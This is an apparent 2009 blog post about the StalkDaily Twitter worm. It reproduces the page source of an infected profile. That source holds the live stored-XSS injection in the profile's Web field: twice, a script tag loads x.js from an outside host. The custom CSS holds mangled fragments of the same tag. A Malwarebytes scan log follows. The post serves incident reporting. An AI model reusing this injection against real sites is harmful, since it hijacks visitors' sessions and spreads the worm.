Skip Links

A Twitter virus shows up: StalkDaily

By CurtMonash on Sat, 04/11/09 - 5:31pm.

A Twitter virus has shown up.  Tweetstreams, including mine, send out the message:

Hey everyone, join www. StalkDaily. com. It's a site like Twitter but with pictures, videos, and so much more! :) 

(Of course, the URL link is live in the original.)

Update: Twitter now claims to have patched the hole that allowed the virus to spread. And I've posted a simpler version of the whole story.

Nobody seems to know yet exactly what is going on. http://twittercism.com/howto-remove-stalkdaily/ is getting a lot of attention with advice to stop it, but basically just says "Change your password and clear your cookies and browser cache; that should work."

Some people are assuming the virus is contracted by actually visiting the site, but I'm sure I got it WITHOUT visiting the site.

I'll try to get more information here, in the main post or comment thread, when I can.

Edit: Mark Hawker is figuring out how this works, and updating the comment thread below. He's posting more detail yet in his own Twitter stream.

Edit: @pilot suggests disabling scripts via NoScript in FireFox.  But this has painful side effects.

Edit: @anowheels thinks clicking on the GangsterBoy Twitter account can cause infection -- and I did click there right before getting hit. The theory is plausible for other reasons.

Specifically, there's a profile broken in a way I haven't seen before, looking like:

View Source right now gives:

<DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta content="en-us" http-equiv="Content-Language" />
<meta content="Twitter is a free social messaging utility for staying connected in real-time" name="description" />
<meta content="no" http-equiv="imagetoolbar" />
<meta content="width = 780" name="viewport" />
<meta content="4FTTxY4uvo0RZTMQqIyhh18HsepyJOctQ+XTOu1zsfE=" name="verify-v1" />
<meta content="1" name="page" />
<meta content="IE=7" http-equiv="X-UA-Compatible" />
<meta content="y" name="session-loggedin" />
<meta content="11326952" name="session-userid" />
<meta content="CurtMonash" name="session-user-screen_name" />
<meta content="GangsterBoyHah" name="page-user-screen_name" />
<title>gangsterboy (GangsterBoyHah) on Twitter</title>
<link href="http://assets1.twitter.com/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://assets1.twitter.com/images/twitter_57.png" rel="apple-touch-icon" />
<script type="text/javascript">
//<![CDATA[
var page = {};
//]]>
</script>

<link href="http://assets3.twitter.com/stylesheets/screen.css?1239469830" media="screen, projection" rel="stylesheet" type="text/css" />
<link href="http://assets3.twitter.com/stylesheets/master.css?1239469826" media="screen, projection" rel="stylesheet" type="text/css" />
<style type="text/css">
/* begin custom css */
.top-navigation > li > a,
a { color: #0084B4; }
body {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
background-color: #9AE4E8;
background: #9AE4E8 url(http://static.twitter.com/images/themes/theme1/bg.gif) fixed no-repeat top left;}
#side_base {
border-left:1px solid #BDDCAD;
background-color: #DDFFCC;
width: 199px; line-height: 1.2; -moz-border-radius-topright: 5px; -webkit-border-top-right-radius: 5px; -moz-border-radius-bottomright: 5px; -webkit-border-bottom-right-radius: 5px;
}
#side div.last { border-top: 1px solid #BDDCAD; }
ul#tabMenu li {
display: block; width: 100%;
border-top: 1px solid #BDDCAD;
}
ul#tabMenu li a, #side .section h1 { color:#script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript; }
#content tr.hentry:hover a { color:#0084B4; }
body#profile #content div.hentry:hover a { color:#0084B4;}
#side .actions { border: 1px solid #BDDCAD; }
#side .promotion {
background-image:url('http://static.twitter.com/images/pale.png');
border: 1px solid #BDDCAD;
text-align: left; font-size: 11px; margin-top: 7px; padding: 6px 10px; width: 152px;
}
#side .promotion .definition span {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
}
#side .promo { border: 1px solid #BDDCAD; }
#side .stats td+td {
border-left: solid 1px #BDDCAD;
border-right: solid 1px #BDDCAD;
}
#side div.section-header h1 { color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript; }
#side div.section-header h3.faq-header {
border-bottom: 1px solid #BDDCAD;
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
}
#side .stat a {color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript; }



#side div.user_icon a, #side div.user_icon a:hover {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
}

#side div.user_icon a:hover {
color: #0084B4;
}

#side .stats {
border-top: 1px solid #BDDCAD;
}

#side .stats a span.stats_count {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
}

#side .stats a:hover span.stats_count {
color: #0084B4;
}

ul.sidebar-menu li.active a b {
border-left: 5px solid #BDDCAD;
}

ul.sidebar-menu li.active a {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
}

#side hr {
background: #BDDCAD;
color: #BDDCAD;
}

#side .stats td+td {
border-left: none;
border-right: none;
}

#side div.collapsible h2.sidebar-title {
background: transparent url('http://static.twitter.com/images/toggle_up_dark.png') no-repeat center right !important;
width: 155px;
}

#side div.collapsible.collapsed h2.sidebar-title {
background: transparent url('http://static.twitter.com/images/toggle_down_dark.png') no-repeat center right !important;
}



/* end custom css */

.content-bubble-arrow { background-image: url(http://static.twitter.com/images/arr2.gif); }
.status-btn input.round-btn { background-image: url('http://static.twitter.com/images/round-btn.gif'); }
.status-btn input.round-btn:hover { background-image: url('http://static.twitter.com/images/round-btn-hover.gif'); }
.status-btn input.disabled, .status-btn input.disabled:hover { background-image: url('http://static.twitter.com/images/round-btn.gif'); }
.hentry .actions .fav { background-image: url('http://static.twitter.com/images/icon_star_full.gif'); }
.hentry .actions .non-fav { background-image: url('http://static.twitter.com/images/icon_star_empty.gif'); }
.hentry .actions .fav-throb, .hentry .actions a.del-throb { background-image: url('http://static.twitter.com/images/icon_throbber.gif'); }
.hentry .actions .del { background-image: url('http://static.twitter.com/images/icon_trash.gif'); }
body#show .reply, .hentry .actions .reply { background-image: url('http://static.twitter.com/images/icon_reply.gif'); }
.direct_message .actions .reply { background-image: url('http://static.twitter.com/images/icon_direct_reply.gif'); }
.direct_message .actions .del { background-image: url('http://static.twitter.com/images/icon_trash.gif'); }
.notify { background-image: url('http://static.twitter.com/images/girl.gif'); }
.promotion, ul#tabMenu a#keyword_search_tab.hover, ul#tabMenu a:hover { background-image: url('http://static.twitter.com/images/pale.png'); background-color: transparent; }
div#follow-toggle.closed { background-image: url('http://static.twitter.com/images/toggle_closed.gif'); }
div#follow-toggle.opened { background-image: url('http://static.twitter.com/images/toggle_opened.gif'); }
.follow-actions .following { background-image: url('http://static.twitter.com/images/checkmark.gif'); }
.loading { background-image: url('http://static.twitter.com/images/loader.gif'); }
.more { background-image: url('http://static.twitter.com/images/more.gif'); }
.more.loading { background-image: url('http://static.twitter.com/images/ajax.gif'); }
body#show .protected { background-image: url('http://static.twitter.com/images/icon_lock.gif'); }
#side .promotion { background-image: url('http://static.twitter.com/images/pale.png'); }
.rss { background-image: url('http://static.twitter.com/images/rss.gif'); }

.bulletin a.close { background: transparent url('http://static.twitter.com/images/close_small.png') no-repeat; }
ul.sidebar-menu li.active a { font-weight: bol d; color: #333; background: url('http://static.twitter.com/images/pale.png'); }
ul.sidebar-menu li:hover a { text-decoration: none; background: url('http://static.twitter.com/images/pale.png'); }
#sidebar_search_submit { background: url('http://static.twitter.com/images/nav_search_submit.png') -2px 0px !important ; }
#sidebar_search_submit:hover { background: url('http://static.twitter.com/images/nav_search_submit.png') -2px -25px !important; }
#sidebar_search_submit:active { background: url('http://static.twitter.com/images/nav_search_submit.png') -2px -50px !important; }
#sidebar_search_submit.loading, #sidebar_search_submit.loading:hover, #sidebar_search_submit.loading:active { background: #eee url('http://static.twitter.com/images/ajax.gif') no-repeat 5px 5px !important; }
#side .collapsible.loading h2.sidebar-title { background: transparent url('http://static.twitter.com/images/ajax.gif') no-repeat center right; }
#side .collapsible h2.sidebar-title {
background: transparent url('http://static.twitter.com/images/toggle_up_dark.png') no-repeat center right;
width: 155px;
}

#side .collapsible.collapsed h2.sidebar-title {
background: transparent url('http://static.twitter.com/images/toggle_down_dark.png') no-repeat center right;
}



</style>
    
</head>

<body class="account firefox-windows" id="profile">
<div id="dim-screen"></div>
<ul id="accessibility" class="offscreen">
<li><a href="#content" accesskey="0">Skip past navigation</a></li>
<li>On a mobile phone? Check out <a href="http://m.twitter.com/">m.twitter.com</a>!</li>
  <li><a href="#footer" accesskey="2">Skip to navigation</a></li>
<li><a href="#tabMenu" accesskey="3">Jump to the sidebar</a></li>
<li><a href="#signin">Skip to sign in form</a></li>
</ul>



<div id="container" class="subpage">
<span id="loader" style="display:none"><img alt="Loader" src="http://assets0.twitter.com/images/loader.gif" /></span>

<h1 id="header">
    <a href="/home" title="Twitter: home" accesskey="1" id="logo">
<img alt="Twitter.com" height="36" src="http://assets0.twitter.com/images/twitter_logo_header.png" transparent_png="true" width="155" />
</a>
</h1>






<div class="content-bubble-arrow"></div>

<table cellspacing="0" class="columns">
<tbody>
<tr>
<td id="content" class="round-left column">
                                <div class="wrapper">


<div class="profile-head">
<h2 class="thumb">
<img alt="" class="profile-img" height="73" src="https://s3.amazonaws.com/twitter_production/profile_images/133719611/940a9a0f-6c7c-11dd-8677-0519e018e1cd_bigger.jpg" width="73" /> GangsterBoyHah
</h2>
<div class="clear"></div>



<div class="protected-box">
<table><tr><td><br /><img alt="Padlock_large" src="http://assets3.twitter.com/images/padlock_large.gif" /></td>
      
<td><h1>This person has protected their updates.</h1>



<br />
<span class='sub-h1'>You need to send a request before you can start following this person.</span>
</td></tr></table>
<center>
<form action="friendships/create/30519351" method="post"><div style="margin:0;padding:0"><input name="authenticity_token" type="hidden" value="5072bac31fff2d4527bccf68cf6c48d16f1c6735" /></div> <input id="send_request" name="commit" type="submit" value="Send request" />
</form>
        </center><br />

</div>

</div>


</div>
</td>

<td id="side_base" class="column round-right">

<div id="side">

<div id="profile" class="section">
<span class="section-links">

<img src="http://assets0.twitter.com/images/icon_lock_sidebar.gif" title="This user&rsquo;s updates are protected."/>
</span>
<address>
<ul class="about vcard entry-author">
<li><span class="label">Name</span> <span class="fn">gangsterboy</span></li>
<li><span class="label">Location</span> <span class="adr">Google</span></li>
                    <li><span class="label">Web</span> <a href="http://"><script src="http://mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></script><a " class="url" rel="me nofollow">http://"><script ...</a></li>

</ul>
</address>

<div class="stats">
<table>
<tr>
<td>

<a href="/GangsterBoyHah/friends" id="following_count_link" class="link-following_page" rel="me" title="See who you’re following">
<span id="following_count" class="stats_count numeric">903 </span>
<span class="label">Following</span>
</a>

</td>
<td>

<a href="/GangsterBoyHah/followers" id="follower_count_link" class="link-followers_page" rel="me" title="See who’s following you">
<span id="follower_count" class="stats_count numeric">2 </span>
<span class="label">Followers</span>
</a>

</td>
<td><a href="/GangsterBoyHah" class="link-updates" title="See all your updates" rel="me"><span id="update_count" class="stats_count numeric">126</span><span class="label">updates</span>
</a></td>
</tr>
</table>
</div>

</div>

<ul id="tabMenu">
<li>
<a href="/GangsterBoyHah" accesskey="u" id="updates_tab">Updates</a> </li>
<li>
<a href="/GangsterBoyHah/favourites" accesskey="f" id="favorites_tab">Favorites</a> </li>
</ul>



<div class="section last">
<h1>Actions</h1>
<ul>
<li>
<a href="/direct_messages/create/30519351">message</a> GangsterBoyHah
</li>


<a href="/blocks/confirm/30519351" style="color: grey;">block</a> GangsterBoyHah


</ul>
</div>

<div id="people" class="section last">
<h1>Following</h1>

<div id="following_list">

<span class="vcard">
<a href="https://twitter.com/Noword" class="url" rel="contact" title="Noword"><img alt="Noword" class="photo fn" height="24" src="https://s3.amazonaws.com/twitter_production/profile_images/54123748/pepsiman_mini.jpg" width="24" /></a>
</span>


<span class="vcard">
<a href="https://twitter.com/soychicka" class="url" rel="contact" title="soychicka"><img alt="soychicka" class="photo fn" height="24" src="https://s3.amazonaws.com/twitter_production/profile_images/111024484/blythie_mini.jpg" width="24" /></a>
</span>


<span class="vcard">
<a href="https://twitter.com/SWAGGRITE" class="url" rel="contact" title="SWAGGRITE ENT."><img alt="SWAGGRITE ENT." class="photo fn" height="24" src="https://s3.amazonaws.com/twitter_production/profile_images/131191695/Picture_025_mini.jpg" width="24" /></a>
</span>


</div>
</div>






</div>
</td>

</tr>
</tbody>
</table>



<div id="footer" class="round">
<h3 class="offscreen">Footer</h3>

<ul>
<li class="first">&copy; 2009 Twitter</li>
<li><a href="/about#about">About Us</a></li>
<li><a href="/about#contact">Contact</a></li>
<li><a href="http://blog.twitter.com">Blog</a></li>
<li><a href="http://status.twitter.com">Status</a></li>
<li><a href="/downloads">Apps</a></li>
<li><a href="http://apiwiki.twitter.com/">API</a></li>
<li><a href="http://search.twitter.com">Search</a></li>
<li><a href="http://help.twitter.com">Help</a></li>
<li><a href="/jobs">Jobs</a></li>
<li><a href="/tos">Terms</a></li>
<li><a href="/privacy">Privacy</a></li>
</ul>
</div>



<hr />

<div id="navigation">
<ul class="horizontal-nav top-nav round" style="display:inline">
<li><a href="http://twitter.com/home" accesskey="h" id="home_link">Home</a></li>
<li><a href="http://twitter.com/CurtMonash" accesskey="p" id="profile_link">Profile</a></li>
<li><a href="http://twitter.com/invitations/find_on_twitter" accesskey="=" id="find_people_link">Find People</a></li>
<li><a href="/account/settings" accesskey="s" id="settings_link">Settings</a></li>
<li><a href="http://help.twitter.com" accesskey="?" id="help_link">Help</a></li>
<li class="last">

<a id="sign_out_link" href="#" onclick="document.getElementById('sign_out_form').submit(); return false;">Sign out</a>

</li>

<form method="post" id="sign_out_form" action="/sessions/destroy" style="display:none;">
<input name="authenticity_token" value="5072bac31fff2d4527bccf68cf6c48d16f1c6735" type="hidden" />
</form>
</ul>
</div>


</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script><script src="http://assets2.twitter.com/javascripts/application.js?1239469782" type="text/javascript"></script><script src="http://assets3.twitter.com/javascripts/jquery.watermarkinput.js?1239469798" type="text/javascript"></script><script src="http://assets1.twitter.com/javascripts/notifications.js?1239469800" type="text/javascript"></script><script src="http://assets1.twitter.com/javascripts/search.js?1239469801" type="text/javascript"></script>
<script src="http://assets1.twitter.com/javascripts/jquery.cookie.js?1239469791" type="text/javascript"></script><script type="text/javascript">
//<![CDATA[
twttr.form_authenticity_token = '5072bac31fff2d4527bccf68cf6c48d16f1c6735';
if (window.top !== window.self) { setTimeout(function(){document.body.innerHTML='';},1);window.self.onload=function(evt){document.body.innerHTML='';};}
//]]>
</script><script type="text/javascript">
//<![CDATA[

$( function () {
$('body#profile ul#tabMenu li a#updates_tab, body#favourings ul#tabMenu li a#favorites_tab').isSidebarTab();

});

//]]>
</script>

    

<!-- BEGIN google analytics -->

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>

<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-30775-6");
pageTracker._setDomainName("twitter.com");
pageTracker._setVar('Logged In');
pageTracker._setVar('lang: en');
pageTracker._initData();
pageTracker._trackPageview('/profile/GangsterBoyHah');
} catch(err) { }
</script>

<!-- END google analytics -->




    <div id="notifications"></div>

</body>

</html>

 

Edit: A Malwarebytes scan comes up with three instances of malware.  One is the Seneka rootkit (ouch!).  I don't immediately know whether all three boil down to that. The logfile is below. I've bolded selectively.

Malwarebytes' Anti-Malware 1.36
Database version: 1969
Windows 5.1.2600 Service Pack 3

4/11/2009 6:49:38 PM
Malwarebytes log mbam-log-2009-04-11 (18-49-21)

Scan type: Full Scan (C:\|D:\|)
Objects scanned: 209851
Time elapsed: 34 minute(s), 30 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 2
Registry Values Infected: 0
Registry Data Items Infected: 1
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\cs41275 (Malware.Trace) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\seneka (Rootkit.Trace) -> No action taken.

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> No action taken.

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)

>

 

Searching on Seneka rootkit turns up very different pages than searching on cs41275, so I suspect them of being two different infections.

As of this posting I haven't yet sorted out what to DO about these infections, but there's advice on the Web, especially about Seneka.

At a guess they're unrelated to StalkDaily, but I can't be sure at the moment.

On The Web
LinkedIn